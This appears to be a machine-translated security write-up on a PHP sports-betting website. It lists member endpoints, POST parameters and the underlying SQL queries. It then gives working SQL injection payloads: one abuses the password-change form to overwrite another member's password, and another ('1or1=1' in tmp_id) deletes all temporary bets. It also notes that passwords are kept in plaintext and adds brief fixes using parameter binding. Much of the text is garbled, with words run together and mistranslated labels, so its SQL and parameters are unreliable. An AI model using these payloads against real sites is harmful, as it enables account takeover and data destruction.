# After login, a new UID is assigned; the user name and password are also passed along.
Presumably there is a data table dedicated to storing this data.
# Possible data table structure:
create table loginuid (
uid char(16),
id integer,
username varchar(30),
time datetime
);
/APP/member/chk_rule.php? Mtype = & uid = 1c2c91396a7f1966
# Mtype does not seem to be a required parameter, and does not play any role.
# The program looks up the uid. If it is invalid, it returns to the home page.
/APP/member/ft_header.php? Uid = 1c2c91396a7f1966 & showtype = & mtype = 3
# Display the top menu. The following parameters are not required, including uid
/APP/member/select. php? Uid = 1c2c91396a7f1966 & mtype = 3
# The leftmost user information area. The UID must be valid.
Football
/APP/member/ft_index.php? Uid = 1c2c91396a7f1966 & langx = ZH-tw & mtype = 3
# After Entering, football is displayed by default. mtype does not seem to have any effect.
/APP/member/ft_browse/index. php? Uid = 1c2c91396a7f1966
# Single-field Rtype = r
/JS/ft_mem_showgame.js
# This seems to be a bet, used to generate a page in the left Information bar
/APP/member/ft_browse/body_var.php
# It is actually an HTML that generates arrays and is useful for future research.
/APP/member/ft_browse/body_browse.php? Uid = 109dc631978b8b0 & Rtype = r
# Displays the information of a single field, but it seems that uid is not required
# Go to the ground: Same as a single field, only Rtype = Re
# Boldlike: Just like a single game, just Rtype = Pd
# AUTUMN: Rtype = T
# Standard pass (Rtype = P) and pass (Rtype = Pr)
Bet:
/APP/member/ft_order/ft_order_m.php? Gid = 843 & uid = 2017dc631978b8b0 & type = H & gnum = 301
# Create a betting page
# GID and gnum are defined in the body_var array.
/APP/member/ft_order/ft_order_m.php
# Handling betting Information
# Post:
Gold = 60 & uid = 109dc631978b8b0 & active = 1 & line_type = 3 & gid = 843 & type = C & gnum =
301 & concede_h = 1 & radio_h = 100 & ioradio_r_h = 6.60 & gmax_single = 30000 & gmin _
Single = 50 & singlecredit = 1000 & singleorder = 500 & restsinglecredit =
0 & wagerstotal = 1000 & restcredit = 1000 & pay_type = 0
# SQL: select fl, FID, pos from ft_follow where gid = '$gid'
# SQL: select * from ft_param where ltype = $line_type and gid = $gid and rtype = '$Rtype'
# SQL: insertintowagersou (gtype, wtype, CID, Sid, aid, mid,
Code, code_value, pay_type, winloss_s,
Winloss_a, gold, gold_d, GID, gnum, strong, type, concede, ratio, ioratio, result,
Orderdate, adddate, wingold, wratio_c, wratio_s, wratio_a, wratio_m, wgold_c,
Wgold_s, wgold_a, wgold_m) values ('ft ', 'M', '7', '26', '123456',' RMB ', '1 ',
'0', '000000', '30', '$ gold', '5. 00', '$ gid',' $ gnum ', '', 'C', '1', '000000',' $ ioradio_r
_ H ', '0', '2017-03-10', '2017-03-100', '0', '95', '95 ',
'95', '000000', '0', '0', '0', '0 ')
/APP/member/ft_order/ft_order_p.php
# Generate a temporary bet
# Post:
Game_id1 = 844 & game1 = H & game_id2 = 846 & game2 = H & game_id3 = 847 & game3 =
H & game_id4 = 848 & game_id5 = 849 & game_id6 = 845 & game_id7 = 850 & teamcount =
7 & active = 1 & uid = 6defa21b702a5d87 & team0310 = % C8 % B7 % C8 % cf
# SQL: select fl, FID, pos from ft_follow where gid = '$game_id1'
# SQL: select ioratio from ft_param where gid = '000000' and rtype = 'm$game1'
/APP/member/ft_order/ft_order_pr.php? Active = 3 & uid =
109dc631978b8b0 & tmp_id = 76507 & pdate =
# Delete a temporary bet. Note tmp_id.
# SQL: delete from wagers_tmp where id = $tmp_id
/APP/member/ft_order/ft_order_pr_finish.php
# Handle multiple bets
# Post:
Wkind = S & wstar = 3 & Gold = 50 & uid = 109dc631978b8b0 & active = 1 & teamcount =
3 & username = caa1307 & singlecredit = 1000 & singleorder = 500 & gmin_single =
50 & gmax_single = 500 & restcredit = 854 & wagerstotal =
0 & pay_type = 0 & SC = 0 + 0 + 0 + & pdate = 2004-03-10
# SQL: selectid, gold, code_valuefromwagerspwheremid = login and
Star = $ teamcountandrtype = 'pr' andgtype = 'ft'
/APP/member/result. php? Game_type = ft & uid = 109dc631978b8b0
# Competition Results
# Post: game_type = ft & today = 2004-03-10 & submit = % B2 % E9 % D1 % af
# SQL: select id, name_c, name_g, name_e from $game_type_leagues
# SQL: select * from $game_type where league_id = '000000' and date = '$today'
and game_over = 'y' order by num_c
Member information:
/APP/member/account/mem_data.php? Uid = 109dc631978b8b0
# Member information, uid must be valid
/APP/member/account/chg_passwd.php? Uid = 109dc631978b8b0
# Change Password
/APP/member/account/chg_passwd.php? Uid = 109dc631978b8b0
# Process password information when action = 1
# Post: Password = ice3y3 & Action = 1 & uid = 109dc631978b8b0
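# SQL: update members set password = PASSWORD('$password'),
passwd = '$password' where id = '000000'
# Note: members.password holds the PASSWORD()-hashed value, members.passwd holds the same password in plaintext, and the ID is calculated based on the UID. Keeping the plaintext copy means anyone who can read the members table obtains every password, regardless of the hash stored next to it.
# Structure: update members set password = PASSWORD('$password'),
passwd = '$password' where id = '000000'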
**************************************** ************
Program Analysis:
Login:
# SQL: select id, username, type from members where username = '$username'
and password = PASSWORD('$password') and 'enabled' = 'y'
Login is verified against members.password, the hashed password field, not against the plaintext field members.passwd.
So only members.password needs to be modified to change the password that login accepts.
Via/APP/member/account/chg_passwd.php? Uid = 109dc631978b8b0 modify
# SQL: update members set password = PASSWORD('$password'), passwd = '$password' where id = '000000'
# Because 'is replaced with \' and \ is replaced with \, the password we modified must contain \ characters.
# $ Password = newpwd ') whereid = ID /*
# After system processing, it will eventually become: $ Password = newpwd \ ') whereid = ID /*
# Import SQL:
# SQL: updatememberssetpassword = PASSWORD ('newpwd \\')
Whereid = ID/* '), passwd = 'newpwd \') whereid = ID/* 'whereid = '000000'
# Equivalent to SQL: updatememberssetpassword = PASSWORD ('newpwd \ ') whereid = ID
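# The ID can be any number, so the statement is no longer limited to the logged-in member's own row. The underlying flaw is that $password is concatenated into the SQL text and the escaping described above does not cover every case; binding the value as a query parameter keeps it from altering the WHERE clause.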
Delete temporary bets:
/APP/member/ft_order/ft_order_pr.php? Active = 3 & uid = 109dc631978b8b0 & tmp_id
= 76507 & pdate =
# Delete a temporary bet. Note tmp_id.
# SQL: delete from wagers_tmp where id = $tmp_id
# $ Tmp_id = 1or1 = 1 /*
# SQL: deletefromwagers_tmpwhereid = 1or1 = 1
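# Result: All temporary bets are deleted, because tmp_id is placed into the statement unquoted and unvalidated. Casting it to an integer, or binding it as a query parameter, confines the delete to a single row.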
//////////////////////////////////////// ///// All rights reserved for iceeye, please refer